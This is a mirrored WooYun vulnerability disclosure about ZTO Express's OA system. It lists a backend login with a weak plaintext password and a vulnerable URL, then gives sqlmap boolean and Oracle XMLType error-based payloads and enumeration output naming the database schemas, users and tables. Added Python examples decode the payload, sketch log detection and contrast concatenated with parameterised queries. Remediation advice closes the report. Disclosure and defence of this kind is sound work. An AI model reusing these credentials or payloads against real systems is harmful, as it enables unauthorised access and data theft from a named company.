WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-11-01: Details sent to the vendor, awaiting vendor response
2015-11-02: Vendor confirmed; details disclosed to the vendor only
2015-11-12: Details disclosed to core white hats and domain experts
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public
Backend weak password + SQL injection
https://sso.zt-express.com/
Account: hongwei   Password: zto666666
Injection point
oa.zt-express.com/OA/InfoCenter/ConsignmentInfo/consignmentselect.aspx?method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b
    Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY
---
[16:44:54] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[16:44:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[16:44:54] [INFO] fetching database (schema) names
[16:44:55] [INFO] the SQL query used returns 7 entries
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] NEWZTOOA
[*] OLAPSYS
[*] SYS
[*] SYSTEM
    Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY
---
[17:03:44] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[17:03:44] [INFO] fetching database users
[17:03:45] [INFO] the SQL query used returns 29 entries
database management system users [29]:
[*] ANONYMOUS
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] READONLY
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB
    Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY
---
[17:06:46] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[17:06:46] [INFO] fetching tables for database: 'NEWZTOOA'
[17:06:46] [INFO] the SQL query used returns 197 entries
sqlmap got a 302 redirect to 'http://oa.zt-express.com:80/Login.aspx'. Do you want to follow? [Y/n] n
Database: NEWZTOOA
[119 tables]
+-------------------------------+
| AA                            |
| DR$CONTENT_IDX$I              |
| DR$CONTENT_IDX$R              |
| TAB_A                         |
| TAB_ADDRESS_DISTRICT          |
| TAB_ADDRESS_ZIPCODE           |
| TAB_CENTER_RATES              |
| TAB_GUARD_PIC                 |
| TAB_NO_PAYBQ                  |
| TAB_PROVINCE_TEMP             |
| TAB_SITE_MONTHCOUNT           |
| TAB_TAOBAO_AREA               |
| TAB_TAOBAO_COMPLAINT          |
| TAB_TAOBAO_GS                 |
| TAB_TAOBAO_RATE               |
| TAB_TAOBAO_SPEED              |
| TAB_TEST1                     |
| TAB_ZTOA_AIRPORTCODE          |
| TAB_ZTOA_AMERCE               |
| TAB_ZTOA_AMERCETWO            |
| TAB_ZTOA_ARBITRATION          |
| TAB_ZTOA_ARBITRATIONAPPEAL    |
| TAB_ZTOA_ARBITRATIONDISP      |
| TAB_ZTOA_ARBITRATIONDISPSITE  |
| TAB_ZTOA_ARBITRATIONMAKEKNOWN |
| TAB_ZTOA_ARBITRATIONSITE      |
| TAB_ZTOA_ARBITRATIONSORT      |
| TAB_ZTOA_ARBITRATIONTYPE      |
| TAB_ZTOA_ASSET_APPLY          |
| TAB_ZTOA_ASSET_APPLY_TRACK    |
| TAB_ZTOA_ASSET_DICTIONARY     |
| TAB_ZTOA_ASSET_NOTES          |
| TAB_ZTOA_ASSET_VENDOR         |
| TAB_ZTOA_BREAKBILL            |
| TAB_ZTOA_BUSLINES             |
| TAB_ZTOA_BUSNAME              |
| TAB_ZTOA_CAHIERDATA           |
| TAB_ZTOA_COMMENTON            |
| TAB_ZTOA_CONSIGNMENT          |
| TAB_ZTOA_CONSIGNMENTINFO      |
| TAB_ZTOA_COURSEWARE           |
| TAB_ZTOA_CUSTOMER             |
| TAB_ZTOA_DATAINFO             |
| TAB_ZTOA_DATASORT             |
| TAB_ZTOA_DIGLOG               |
| TAB_ZTOA_DISPOSEBOOK          |
| TAB_ZTOA_DISPOSESITE          |
| TAB_ZTOA_EMPLOYEE             |
| TAB_ZTOA_FINANCE_LIST         |
| TAB_ZTOA_FINANCE_TYPE         |
| TAB_ZTOA_FLIGHTS              |
| TAB_ZTOA_FUNCTIONMODULE       |
| TAB_ZTOA_GUESTBOOK            |
| TAB_ZTOA_HRBASICINFO          |
| TAB_ZTOA_HRDUTY               |
| TAB_ZTOA_HYPOLINER            |
| TAB_ZTOA_HYPOLINERDATA        |
| TAB_ZTOA_ITEQUIPMENT          |
| TAB_ZTOA_ITREGISTER           |
| TAB_ZTOA_ITSTORAGE            |
| TAB_ZTOA_ITWORK               |
| TAB_ZTOA_K8HELP               |
| TAB_ZTOA_LEAVEBEHINDDATA      |
| TAB_ZTOA_LOGINPAGE            |
| TAB_ZTOA_MAINLINER            |
| TAB_ZTOA_MAINLINERDATA        |
| TAB_ZTOA_MOTIF                |
| TAB_ZTOA_MOTIFCHILD           |
| TAB_ZTOA_NEWSDEPARTMENT       |
| TAB_ZTOA_NEWSSORT             |
| TAB_ZTOA_NOBILL               |
| TAB_ZTOA_OLDSCANGUN           |
| TAB_ZTOA_ONDUTY               |
| TAB_ZTOA_PAISONGFEI           |
| TAB_ZTOA_PINGIP               |
| TAB_ZTOA_PINGLIST             |
| TAB_ZTOA_POSTCODE             |
| TAB_ZTOA_POST_REPORT          |
| TAB_ZTOA_PROVINCELINER        |
| TAB_ZTOA_PROVINCELINERDATA    |
| TAB_ZTOA_PUCHA                |
| TAB_ZTOA_PUCHA_BAK            |
| TAB_ZTOA_RELATINGPOSTCODE     |
| TAB_ZTOA_REOPRTSITE           |
| TAB_ZTOA_REPORTCHILD          |
| TAB_ZTOA_ROLEFUNCTION         |
| TAB_ZTOA_ROLES                |
| TAB_ZTOA_SITEBOOK             |
| TAB_ZTOA_SITEBOOKBACK         |
| TAB_ZTOA_SITEMAP              |
| TAB_ZTOA_SITEPROVINCE         |
| TAB_ZTOA_SITEVISUALIZE        |
| TAB_ZTOA_SQLTOCSV             |
| TAB_ZTOA_SUFFRAGE             |
| TAB_ZTOA_SUPERVISE            |
| TAB_ZTOA_TASK                 |
| TAB_ZTOA_TASK_ADDED           |
| TAB_ZTOA_TASK_FILE            |
| TAB_ZTOA_TASK_USER            |
| TAB_ZTOA_TRANSFERFEE          |
| TAB_ZTOA_USERPHONE            |
| TAB_ZTOA_USERSITEIT           |
| TAB_ZTOA_USERTEL              |
| TAB_ZTOA_USERVALIDATE         |
| TAB_ZTOA_WEBLOG               |
| TAB_ZTOA_WORKLOG              |
| TAB_ZTOA_YIYUN1               |
| TAB_ZTOA_YIYUN2               |
| TAB_ZTOA_YZTJYB               |
| TAB_ZTOA_ZHIFUBAO             |
| TAB_ZTOA_ZTBEST               |
| TAB_ZTOOA_IPMANAGE            |
| TAB_ZTWEB_BILLSEARCHLOG       |
| TAB_ZTWEB_CITY                |
| TAB_ZTWEB_EXAMINEE            |
| TAB_ZTWEB_JOB                 |
| TAB_ZTWEB_PROVINCE            |
| TAB_ZTWEB_SITE2               |
| TAB_ZTWEB_SLIDE               |
+-------------------------------+

The query reported 197 tables but the listing holds 119: enumeration stopped when the application answered with a 302 to Login.aspx, i.e. the OA session sqlmap was riding on (logged in with the weak credentials above) was no longer valid, and the redirect was not followed. The injection point itself sits behind the login, so the weak password is what made the SQL injection reachable.
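The error-based payload above is hard to read because sqlmap spells every string as a CHR() chain. The following is an added example (not part of the WooYun report, the ZTO application or sqlmap) that decodes the payload, pulls out the two marker tags sqlmap wraps around the injected subquery, and shows how the subquery's value is read back from Oracle's XML parse error. SAMPLE_ERROR is a constructed stand-in for the ASP.NET error page, not a capture from the target; the detection regex at the end is an assumption about how the probe looks in IIS or WAF logs after URL-decoding.

```python
"""Decode sqlmap's Oracle error-based (XMLType) payload and read the
injected value back out of the error text. Added example for this page."""
import re
from typing import Optional, Tuple

# The error-based payload exactly as it appears in the sqlmap output above.
PAYLOAD = (
    "d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType("
    "CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||"
    "(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||"
    "CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) "
    "AND 'eGnY'='eGnY"
)

# One run of CHR(n)||CHR(m)||... ; sqlmap uses it to avoid quote characters.
CHR_CHAIN = re.compile(r"CHR\(\d+\)(?:\|\|CHR\(\d+\))*")


def decode_chr_chains(sql: str) -> str:
    """Rewrite every CHR() chain as the string literal it builds, so the
    payload reads as the SQL Oracle actually evaluates."""
    def repl(m):
        codes = re.findall(r"CHR\((\d+)\)", m.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHR_CHAIN.sub(repl, sql)


def markers(decoded_sql: str) -> Tuple[str, str]:
    """Return the (start, stop) tags sqlmap wrapped around the subquery.
    XMLType('<:' || start || value || stop || '>') is not well-formed XML
    (an element name may not begin with ':'), so Oracle raises a parse
    error that quotes the offending name, injected value included."""
    start = re.search(r"'<:(\w+)'", decoded_sql).group(1)
    stop = re.search(r"'(\w+)>'", decoded_sql).group(1)
    return start, stop


# Constructed: the shape of an unhandled-exception page from an ASP.NET app
# that lets the ORA-31011 text through. Only the value between the markers
# matters to sqlmap; the surrounding wording varies by stack.
SAMPLE_ERROR = (
    "Server Error in '/OA' Application.\n"
    "ORA-31011: XML parsing failed\n"
    "ORA-19202: Error occurred in XML processing\n"
    "LPX-00110: Invalid XML name ':qzkvq1qvkjq'\n"
)


def extract_result(body: str, start: str, stop: str) -> Optional[str]:
    """What sqlmap does with each response: take the text between the tags.
    For the probe above that is '1', the CASE WHEN result, which confirms
    that the subquery ran inside the database."""
    m = re.search(re.escape(start) + r"(.*?)" + re.escape(stop), body, re.S)
    return m.group(1) if m else None


def looks_like_xmltype_probe(query_string: str) -> bool:
    """Detection side (assumed log format, URL-decoded): the technique is
    recognisable by XMLType( followed by the '<:' marker chain
    CHR(60)||CHR(58) that every instance of this sqlmap payload starts with."""
    return bool(re.search(r"XMLType\(CHR\(60\)\|\|CHR\(58\)", query_string, re.I))


if __name__ == "__main__":
    decoded = decode_chr_chains(PAYLOAD)
    print(decoded)
    s, e = markers(decoded)
    print("markers:", s, e, "-> value:", extract_result(SAMPLE_ERROR, s, e))
```

Decoded, the injected expression is `XMLType('<:qzkvq' || (SELECT ...) || 'qvkjq>')`: an element whose name starts with a colon, which Oracle refuses, echoing the name and therefore the subquery result in the error. That is why the report's sqlmap runs were so fast (one request per value) and why an ASP.NET application that returns database exception text to the client turns any injection into a direct data dump.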
Fix: change the password; filter SQL special characters. Character filtering is only a stopgap: the durable fix is to pass CONSIGNMENTID as a bind variable in a parameterised query so the value is never parsed as SQL, and to stop returning database exception text to the client.
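How the string-concatenated lookup behind a page like consignmentselect.aspx yields the boolean-blind oracle sqlmap used, beside the bound-parameter form that closes it. This is an added example, not code from the ZTO OA application (its real query is not on the page); the table layout, the rows and the use of SQLite's in-memory engine in place of Oracle are assumptions so that it runs offline. The probe strings are the ones from the sqlmap output above, plus their false twin.

```python
"""Concatenated vs. parameterised consignment lookup. Added example;
SQLite stands in for Oracle and the rows are constructed."""
import sqlite3
from typing import Callable, List

TARGET_ID = "d556338ceafb4afb9889b28f0568244b"
TRUE_PROBE = TARGET_ID + "' AND 9874=9874 AND 'XlcM'='XlcM"   # from sqlmap
FALSE_PROBE = TARGET_ID + "' AND 9874=9875 AND 'XlcM'='XlcM"  # its false twin


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for NEWZTOOA.TAB_ZTOA_CONSIGNMENTINFO."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE TAB_ZTOA_CONSIGNMENTINFO (CONSIGNMENTID TEXT, CONSIGNEE TEXT)"
    )
    con.executemany(
        "INSERT INTO TAB_ZTOA_CONSIGNMENTINFO VALUES (?, ?)",
        [(TARGET_ID, "sample consignee A"), ("0" * 32, "sample consignee B")],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, consignment_id: str) -> List[str]:
    """The pattern the payload implies: the GET parameter is spliced into the
    SQL text inside single quotes, so a quote in the value ends the literal
    and everything after it is parsed as SQL."""
    sql = (
        "SELECT CONSIGNEE FROM TAB_ZTOA_CONSIGNMENTINFO WHERE CONSIGNMENTID = '"
        + consignment_id
        + "'"
    )
    return [row[0] for row in con.execute(sql)]


def lookup_parameterised(con: sqlite3.Connection, consignment_id: str) -> List[str]:
    """Bound parameter: the value never becomes part of the SQL text, so a
    probe is just an id string that matches no row, true twin or false."""
    sql = "SELECT CONSIGNEE FROM TAB_ZTOA_CONSIGNMENTINFO WHERE CONSIGNMENTID = ?"
    return [row[0] for row in con.execute(sql, (consignment_id,))]


def blind_oracle_visible(
    lookup: Callable[[sqlite3.Connection, str], List[str]]
) -> bool:
    """True when a true and a false condition give different responses,
    which is all the boolean-based blind technique needs."""
    con = make_db()
    return lookup(con, TRUE_PROBE) != lookup(con, FALSE_PROBE)


if __name__ == "__main__":
    print("concatenated  :", blind_oracle_visible(lookup_vulnerable))    # True
    print("parameterised :", blind_oracle_visible(lookup_parameterised))  # False
```

With Oracle and ODP.NET the same fix is a bind variable: a `:CONSIGNMENTID` placeholder in the SQL text with the value supplied as an OracleParameter. The database then treats the value as data whatever characters it contains, which is what quote-filtering only approximates (it does nothing for numeric or LIKE contexts, or for values that reach SQL by a second path).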
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-11-02 09:29
Thanks to the white hat for the hard work; development has already started on a fix.